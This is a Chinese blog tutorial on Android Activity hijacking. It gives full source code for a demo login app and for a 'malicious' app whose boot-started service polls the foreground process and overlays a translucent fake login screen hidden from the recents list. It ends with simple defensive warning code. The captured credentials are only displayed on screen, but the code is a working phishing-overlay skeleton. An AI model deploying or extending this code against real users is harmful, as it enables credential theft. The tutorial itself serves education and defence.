Activity劫持实例与防护手段
原文地址:Activity劫持实例与防护手段 作者:cjxqhhh
(本文只用于学习技术,提高大家警觉,切勿用于非法用途!)
什么叫Activity劫持
这里举一个例子。用户打开安卓手机上的某一应用,进入到登陆页面,这时,恶意软件侦测到用户的这一动作,立即弹出一个与该应用
界面相同的Activity,覆盖掉了合法的Activity,用户几乎无法察觉,该用户接下来输入用户名和密码的操作其实是在恶意软件的Activity上进行的,接下来会发生什么就可想而知了。
实例
Activity劫持的危害是非常大的,它的具体实现和一些细节,我将会用一个完整的实例说明:
首先,我们在Android Studio中新建一个工程,项目结构如下:
activity_main.xml的内容:点击(此处)折叠或打开
- <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
- xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent"
- android:layout_height="match_parent" >
- <TextView
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="Normal Activity"
- android:gravity="center_horizontal"
- android:padding="10dp"
- android:background="#ffffff"/>
- <LinearLayout
- android:id="@+id/Layout1"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_centerHorizontal="true"
- android:layout_marginTop="80dp"
- android:orientation="horizontal">
- <TextView
- android:text="UserName"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:textColor="#000000"
- android:textSize="20dp" />
- <EditText
- android:id="@+id/UserNameEdit"
- android:layout_width="100dp"
- android:layout_height="wrap_content" />
- </LinearLayout>
- <LinearLayout
- android:id="@+id/Layout2"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_centerHorizontal="true"
- android:layout_marginTop="50dp"
- android:orientation="horizontal"
- android:layout_below="@id/Layout1">
- <TextView
- android:text="Password"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:textColor="#000000"
- android:textSize="20dp" />
- <EditText
- android:id="@+id/PasswordEdit"
- android:layout_width="100dp"
- android:layout_height="wrap_content" />
- </LinearLayout>
- <Button
- android:id="@+id/LoginButton"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_below="@id/Layout2"
- android:layout_marginTop="5dp"
- android:layout_centerHorizontal="true"
- android:text="Login"/>
- </RelativeLayout>
activity_second.xml的内容:只是一个TextView控件,显示"Second Activity"而已,就不贴代码了。MainActivity.java的内容:
点击(此处)折叠或打开
- package com.example.hac.normalapp;
- import android.app.Activity;
- import android.content.Intent;
- import android.os.Bundle;
- import android.view.View;
- import android.widget.Button;
- import android.widget.EditText;
- //一个简单的界面,模拟用户输入用户名、密码,点击按钮后就跳转到SecondActivity
- //只是为了演示正常的Activity而已,无实际功能
- public class MainActivity extends Activity {
- Button login = null;
- EditText userName = null;
- EditText password = null;
- @Override
- protected void onCreate(Bundle savedInstanceState) {
- super.onCreate(savedInstanceState);
- setContentView(R.layout.activity_main);
- login = (Button)findViewById(R.id.LoginButton);
- userName = (EditText)findViewById(R.id.UserNameEdit);
- password = (EditText)findViewById(R.id.PasswordEdit);
- login.setOnClickListener(new View.OnClickListener() {
- @Override
- public void onClick(View view) {
- Intent intent = new Intent(MainActivity.this, SecondActivity.class);
- //启动SecondActivity
- startActivity(intent);
- }
- });
- }
- }
SecondActivity.java的内容:无内容,就是一个空的Activity,用于显示activity_second.xml的内容而已,不贴代码啦。
AndroidMainfest.xml的内容:就是普通的内容,不贴代码了。接下来是我们的恶意软件,再新建一个工程,项目结构如下:
activity_fakemain.xml的内容:我们伪造的Activity布局,模仿上面正常的Activity布局。点击(此处)折叠或打开
- <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
- xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent"
- android:layout_height="match_parent" >
- <TextView
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="Normal Activity"
- android:gravity="center_horizontal"
- android:padding="10dp"
- android:background="#ffffff"
- android:visibility="invisible"/>
- <LinearLayout
- android:id="@+id/Layout1"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_centerHorizontal="true"
- android:layout_marginTop="80dp"
- android:orientation="horizontal">
- <TextView
- android:text="UserName"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:textColor="#000000"
- android:textSize="20dp"
- android:visibility="invisible"/>
- <EditText
- android:id="@+id/UserNameEdit"
- android:layout_width="100dp"
- android:layout_height="wrap_content"
- android:visibility="invisible"/>
- </LinearLayout>
- <LinearLayout
- android:id="@+id/Layout2"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_centerHorizontal="true"
- android:layout_marginTop="50dp"
- android:orientation="horizontal"
- android:layout_below="@id/Layout1">
- <TextView
- android:text="Password"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:textColor="#000000"
- android:textSize="20dp"
- android:visibility="invisible"/>
- <EditText
- android:id="@+id/PasswordEdit"
- android:layout_width="100dp"
- android:layout_height="wrap_content"
- android:visibility="invisible"/>
- </LinearLayout>
- <Button
- android:id="@+id/LoginButton"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_below="@id/Layout2"
- android:layout_marginTop="5dp"
- android:layout_centerHorizontal="true"
- android:text="Login"
- android:visibility="invisible"/>
- </RelativeLayout>
activity_main.xml的内容:
点击(此处)折叠或打开
- <?xml version="1.0" encoding="utf-8"?>
- <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
- android:orientation="vertical" android:layout_width="match_parent"
- android:layout_height="match_parent">
- <TextView
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:text="Start"
- android:textSize="50dp"/>
- <Button
- android:id="@+id/StartServiceButton"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:text="StartService"
- android:padding="20dp"
- android:layout_gravity="center_horizontal"/>
- </LinearLayout>
activity_main.xml的内容:
点击(此处)折叠或打开
- <?xml version="1.0" encoding="utf-8"?>
- <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
- android:orientation="vertical" android:layout_width="match_parent"
- android:layout_height="match_parent">
- <TextView
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:text="Start"
- android:textSize="50dp"/>
- <Button
- android:id="@+id/StartServiceButton"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:text="StartService"
- android:padding="20dp"
- android:layout_gravity="center_horizontal"/>
- </LinearLayout>
AutoStartReceiver.java的内容:
点击(此处)折叠或打开
- package com.example.hac.evilapp;
- import android.content.BroadcastReceiver;
- import android.content.Context;
- import android.content.Intent;
- //用于开机自动启动HijackService的Receiver,它能够响应“android.intent.action.BOOT_COMPLETED”
- public class AutoStartReceiver extends BroadcastReceiver {
- @Override
- public void onReceive(Context context, Intent intent) {
- if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {
- Intent _intent = new Intent(context, HijackService.class);
- //启动HijackService
- context.startService(_intent);
- }
- }
- }
EvilApplication.java的内容:
点击(此处)折叠或打开
- package com.example.hac.evilapp;
- import android.app.Application;
- import java.util.ArrayList;
- import java.util.List;
- public class EvilApplication extends Application{
- //存放已经被劫持的程序
- List<String> hijackedList = new ArrayList<String>();
- public boolean hasProgressBeHijacked(String processName) {
- return hijackedList.contains(processName);
- }
- public void addHijacked(String processName) {
- hijackedList.add(processName);
- }
- public void clearHijacked() {
- hijackedList.clear();
- }
- }
FakeMainActivity.java的内容:
点击(此处)折叠或打开
- package com.example.hac.evilapp;
- import android.app.Activity;
- import android.os.Bundle;
- import android.view.View;
- import android.widget.Button;
- import android.widget.EditText;
- import android.widget.Toast;
- import java.util.Timer;
- import java.util.TimerTask;
- public class FakeMainActivity extends Activity {
- Button login = null;
- EditText userName = null;
- EditText password = null;
- @Override
- protected void onCreate(Bundle savedInstanceState) {
- super.onCreate(savedInstanceState);
- setContentView(R.layout.activity_fakemain);
- login = (Button)findViewById(R.id.LoginButton);
- userName = (EditText)findViewById(R.id.UserNameEdit);
- password = (EditText)findViewById(R.id.PasswordEdit);
- //下面这段代码主要是为了使用户更难察觉出我们伪造的Activity
- //原理是保证我们伪造的Activity已经覆盖在真实的Activity上后,再将我们的控件显示出来
- //我本来是想让我们伪造的Activity直接在原位淡入的,但没有实现,郁闷
- //无奈只能用这个本方法,如果大家有更好的办法,请赐教
- Timer timer = new Timer();
- TimerTask task = new TimerTask() {
- @Override
- public void run() {
- runOnUiThread(new Runnable(){
- @Override
- public void run() {
- userName.setVisibility(View.VISIBLE);
- password.setVisibility(View.VISIBLE);
- login.setVisibility(View.VISIBLE);
- }});
- }
- };
- timer.schedule(task, 1000);
- login.setOnClickListener(new View.OnClickListener() {
- @Override
- public void onClick(View view) {
- //这里为了显示效果,将用户输入的内容显示出来,真正的恶意软件则会直接将信息发送给自己
- Toast.makeText(getApplicationContext(), userName.getText().toString() + " / " + password.getText().toString(), Toast.LENGTH_LONG).show();
- //为了伪造的Activity弹出时不那么明显
- userName.setVisibility(View.INVISIBLE);
- password.setVisibility(View.INVISIBLE);
- login.setVisibility(View.INVISIBLE);
- finish();
- }
- });
- }
- }
HijackService.java的内容:
点击(此处)折叠或打开
- package com.example.hac.evilapp;
- import android.app.ActivityManager;
- import android.app.Service;
- import android.content.Context;
- import android.content.Intent;
- import android.os.Handler;
- import android.os.IBinder;
- import android.util.Log;
- import java.util.HashMap;
- import java.util.List;
- public class HijackService extends Service {
- //targetMap用于存放我们的目标程序
- HashMap<String, Class<?>> targetMap = new HashMap<String, Class<?>>();
- Handler handler = new Handler();
- boolean isStart = false;
- //我们新建一个Runnable对象,每隔200ms进行一次搜索
- Runnable searchTarget = new Runnable() {
- @Override
- public void run() {
- //得到ActivityManager
- ActivityManager activityManager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
- //通过ActivityManager将当前正在运行的进程存入processInfo中
- List<ActivityManager.RunningAppProcessInfo> processInfo = activityManager.getRunningAppProcesses();
- Log.w("恶意软件", "遍历进程");
- //遍历processInfo中的进程信息,看是否有我们的目标
- for (ActivityManager.RunningAppProcessInfo _processInfo : processInfo) {
- //若processInfo中的进程正在前台且是我们的目标进程,则调用hijack方法进行劫持
- if (_processInfo.importance == ActivityManager.RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {
- if (targetMap.containsKey(_processInfo.processName)) {
- // 调用hijack方法进行劫持
- hijack(_processInfo.processName);
- } else {
- Log.w("进程", _processInfo.processName);
- }
- }
- }
- handler.postDelayed(searchTarget, 200);
- }
- };
- //进行Activity劫持的函数
- private void hijack(String processName) {
- //这里判断我们的目标程序是否已经被劫持过了
- if (((EvilApplication) getApplication())
- .hasProgressBeHijacked(processName) == false) {
- Log.w("恶意软件", "开始劫持"+processName);
- Intent intent = new Intent(getBaseContext(),
- targetMap.get(processName));
- //这里必须将flag设置为Intent.FLAG_ACTIVITY_NEW_TASK,这样才能将我们伪造的Activity至于栈顶
- intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
- //启动我们伪造的Activity
- getApplication().startActivity(intent);
- //将目标程序加入到已劫持列表中
- ((EvilApplication) getApplication()).addHijacked(processName);
- Log.w("恶意软件", "已经劫持");
- }
- }
- @Override
- public void onStart(Intent intent, int startId) {
- super.onStart(intent, startId);
- if (!isStart) {
- //将我们的目标加入targetMap中
- //这里,key为我们的目标进程,value为我们伪造的Activity
- targetMap.put("com.example.hac.normalapp",
- FakeMainActivity.class);
- //启动searchTarget
- handler.postDelayed(searchTarget, 1000);
- isStart = true;
- }
- }
- @Override
- public boolean stopService(Intent name) {
- isStart = false;
- Log.w("恶意软件", "停止劫持");
- //清空劫持列表
- ((EvilApplication) getApplication()).clearHijacked();
- //停止searchTarget
- handler.removeCallbacks(searchTarget);
- return super.stopService(name);
- }
- @Override
- public IBinder onBind(Intent intent) {
- return null;
- }
- }
StartServiceActivity.java的内容:
点击(此处)折叠或打开
- package com.example.hac.evilapp;
- import android.app.Activity;
- import android.content.Intent;
- import android.os.Bundle;
- import android.view.View;
- import android.widget.Button;
- //用于手动启动我们的HijackService,真正的恶意软件通常不会有这样的一个Activity
- public class StartServiceActivity extends Activity {
- Button startButton = null;
- @Override
- public void onCreate(Bundle savedInstanceState) {
- super.onCreate(savedInstanceState);
- setContentView(R.layout.activity_main);
- startButton = (Button)findViewById(R.id.StartServiceButton);
- startButton.setOnClickListener(new View.OnClickListener() {
- @Override
- public void onClick(View view) {
- Intent intent2 = new Intent(StartServiceActivity.this, HijackService.class);
- startService(intent2);
- }
- });
- }
- }
colors.xml的内容:
点击(此处)折叠或打开
- <?xml version="1.0" encoding="utf-8"?>
- <resources>
- <color name="translucent_background">#00000000</color>>
- </resources>
styles.xml的内容:
点击(此处)折叠或打开
- <resources>
- <!-- Base application theme. -->
- <style name="AppTheme" parent="Theme.AppCompat.Light.DarkActionBar">
- <!-- Customize your theme here. -->
- </style>
- <style name="translucent" parent="Theme.AppCompat.Light.DarkActionBar">
- <item name="android:windowBackground">@color/translucent_background</item>
- <item name="android:windowIsTranslucent">true</item>
- <item name="android:windowAnimationStyle">@android:style/Animation.Translucent</item>
- </style>
- </resources>
AndroidMainfest.xml的内容:注意HijackService和AutoStartReceiver要在这里注册,且要添加相应的权限。另外,添加andorid:excludeFromRecent="true"这一项能够防止我们的恶意程序在最近访问列表中出现,这将提升其危险程度。
点击(此处)折叠或打开
- <?xml version="1.0" encoding="utf-8"?>
- <manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="com.example.hac.evilapp" >
- <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
- <application
- android:name=".EvilApplication"
- android:allowBackup="true"
- android:icon="@drawable/ic_launcher"
- android:label="@string/app_name"
- android:theme="@style/AppTheme" >
- <activity
- android:name=".StartServiceActivity"
- android:label="@string/app_name"
- android:excludeFromRecents="true">
- <intent-filter>
- <action android:name="android.intent.action.MAIN" />
- <category android:name="android.intent.category.LAUNCHER" />
- </intent-filter>
- </activity>
- <activity android:name=".FakeMainActivity" android:excludeFromRecents="true" android:theme="@style/translucent"/>
- <service android:name=".HijackService" ></service>
- <receiver
- android:name=".AutoStartReceiver"
- android:enabled="true"
- android:exported="true" >
- <intent-filter>
- <action android:name="android.intent.action.BOOT_COMPLETED" />
- </intent-filter>
- </receiver>
- </application>
- </manifest>
项目工程下载(ChinaUnix对文件大小有限制,只能传百度网盘了):
http://pan.baidu.com/s/1eQ8JF5w
防护手段
目前,还没有什么专门针对Activity劫持的防护方法,因为,这种攻击是用户层面上的,目前还无法从代码层面上根除。
但是,我们可以适当地在APP中给用户一些警示信息,提示用户其登陆界面以被覆盖,并给出覆盖正常Activity的类名,示例如下:
1、在前面建立的正常Activity的登陆界面(也就是MainActivity)中重写onKeyDown方法和onPause方法,这样一来,当其被覆盖时,就能够弹出警示信息,代码如下:点击(此处)折叠或打开
- @Override
- public boolean onKeyDown(int keyCode, KeyEvent event) {
- //判断程序进入后台是否是用户自身造成的(触摸返回键或HOME键),是则无需弹出警示。
- if((keyCode==KeyEvent.KEYCODE_BACK || keyCode==KeyEvent.KEYCODE_HOME) && event.getRepeatCount()==0){
- needAlarm = false;
- }
- return super.onKeyDown(keyCode, event);
- }
- @Override
- protected void onPause() {
- //若程序进入后台不是用户自身造成的,则需要弹出警示
- if(needAlarm) {
- //弹出警示信息
- Toast.makeText(getApplicationContext(), "您的登陆界面被覆盖,请确认登陆环境是否安全", Toast.LENGTH_SHORT).show();
- //启动我们的AlarmService,用于给出覆盖了正常Activity的类名
- Intent intent = new Intent(this, AlarmService.class);
- startService(intent);
- }
- super.onPause();
- }
2、实现AlarmService.java,代码如下:
点击(此处)折叠或打开
- package com.example.hac.normalapp;
- import android.app.ActivityManager;
- import android.app.Service;
- import android.content.Context;
- import android.content.Intent;
- import android.os.Handler;
- import android.os.IBinder;
- import android.widget.Toast;
- public class AlarmService extends Service{
- boolean isStart = false;
- Handler handler = new Handler();
- Runnable alarmRunnable = new Runnable() {
- @Override
- public void run() {
- //得到ActivityManager
- ActivityManager activityManager = (ActivityManager)getSystemService(Context.ACTIVITY_SERVICE);
- //getRunningTasks会返回一个List,List的大小等于传入的参数。
- //get(0)可获得List中的第一个元素,即栈顶的task
- ActivityManager.RunningTaskInfo info = activityManager.getRunningTasks(1).get(0);
- //得到当前栈顶的类名,按照需求,也可以得到完整的类名和包名
- String shortClassName = info.topActivity.getShortClassName(); //类名
- //完整类名
- //String className = info.topActivity.getClassName();
- //包名
- //String packageName = info.topActivity.getPackageName();
- Toast.makeText(getApplicationContext(), "当前运行的程序为"+shortClassName, Toast.LENGTH_LONG).show();
- }
- };
- @Override
- public int onStartCommand(Intent intent, int flag, int startId) {
- super.onStartCommand(intent, flag, startId);
- if(!isStart) {
- isStart = true;
- //启动alarmRunnable
- handler.postDelayed(alarmRunnable, 1000);
- stopSelf();
- }
- return START_STICKY;
- }
- @Override
- public IBinder onBind(Intent intent) {
- return null;
- }
- }
3、最后在AndroidManifest.xml中注册AlarmService即可。
新手发文,写得不对不好的地方麻烦指出,谢谢。
Activity劫持实例与防护手段的更多相关文章
- 使用VS2012 开发SharePoint 2013 声明式的action(activity) 综合实例
本文讲述使用VS2012 开发SharePoint 2013 声明式的action 综合实例. 需求同: http://blog.csdn.net/abrahamcheng/article/detai ...
- 跨站请求伪造(csrf)的防护手段
CSRF CSRF全拼为Cross Site Request Forgery,译为跨站请求伪造. CSRF指攻击者盗用了你的身份,以你的名义发送恶意请求. 造成的问题:个人隐私泄露以及财产安全. CS ...
- SCRF的简介及防护手段
CSRF全拼为Cross Site Request Forgery,译为跨站请求伪造. CSRF指攻击者盗用了你的身份,以你的名义发送恶意请求. 包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购 ...
- Android APP漏洞挖掘
0x00 1.组件公开安全漏洞 參考Android 组件安全. 2.Content Provider文件文件夹遍历漏洞 參考Content Provider文件文件夹遍历漏洞浅析. 3.Android ...
- 3. 移动安全渗透测试-(Android基础漏洞)
3.1 数据存储漏洞 用户经常会把敏感数据交给app,比如:用户名and密码认证令牌联系人记录通信记录历史使用记录..... 只要愿意,app可以收集这些用户的隐私和个人信息明文存储或明文传输,通常保 ...
- Android移动APP开发笔记——Cordova(PhoneGap)通过CordovaPlugin插件调用 Activity 实例
引言 Cordova(PhoneGap)采用的是HTML5+JavaScript混合模式来开发移动手机APP,因此当页面需要获取手机内部某些信息时(例如:联系人信息,坐标定位,短信等),程序就需要调用 ...
- 深入理解Activity -动手写实例来感受Activity的启动模式
介绍 上篇提到了Activity的任务,任务栈,以及启动模式.对这些概念有了了解以后,自己写一下例子来感受一下,就当作复习和加深印象了.如果对概念不熟悉的可以参考:深入理解Activity-任务,回退 ...
- Android 一个Activity保存它自己的实例
一个Activity保存他自己的实例的作用是,在其他Activity中可以方便的调用该Activity里的方法. 我们可以使用一个静态的变量保存当前Activity的实例,并将其标志为private访 ...
- activity生命周期实例(不同启动模式)
1.生命周期的几个阶段介绍: onCreate: 表示activity被创建,做一些初始化工作如调用setContentView去加载界面布局资源.初始化Acitivity所需数据等. onResta ...
随机推荐
- flexbox布局
一.侧轴对齐伸缩项目--align-items 它充许调整伸缩项目在侧轴(也就是y轴)的对齐方式,主要包括以下几个值: flex-start/baseline:伸缩项目在侧轴起点边的外边距紧靠住该行在 ...
- Windows 2012 R2图标以及字体颜色发生变化更改成默认设置
1. 在桌面按"Win+R",然后输出regedit.2. 定位到HKEY_CURRENT_USER\Control panel\Colors3. 对照下面提供给您的初始化颜色的注 ...
- Android WIFI 分析(一)
本文基于<深入理解Android WiFi NFC和GPS 卷>和 Android N 代码结合分析 WifiService 是 Frameworks中负责wifi功能的核心服务,它主 ...
- eclipse项目自动发布到tomcat目录,缺文件。
eclipse项目自动发布到tomcat目录,缺文件. 解决方案: 项目--Properties-->Deployment Assembly-->Add--> Folder Add- ...
- 使用SVN时出现的文件缺失问题
使用SVN的童鞋们,可能有三种提交代码的方法: 第一种使用客户端(例如SVNX,CornerStone): 第二种使用Xcode提交(Source Control -> commit): 第三种 ...
- notepad++ 离线插件下载
http://www.cnblogs.com/findumars/p/5180562.html
- Linq group
using System;using System.Collections.Generic;using System.Linq; public class MyClass{ public static ...
- 终端 git log 修改样式
git config --global alias.lg "log --color --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d ...
- POJ 2135 Farm Tour 最小费用流
两条路不能有重边,既每条边的容量是1.求流量为2的最小费用即可. //#pragma comment(linker, "/STACK:1024000000,1024000000") ...
- workflow createPath
针对不同的流程,createpath不同,但是创建审批链,和创建表都有 1.GetUserInfoByListColumn 控件已创建的.先Rebuild,属性需要注意 2.CreateListIte ...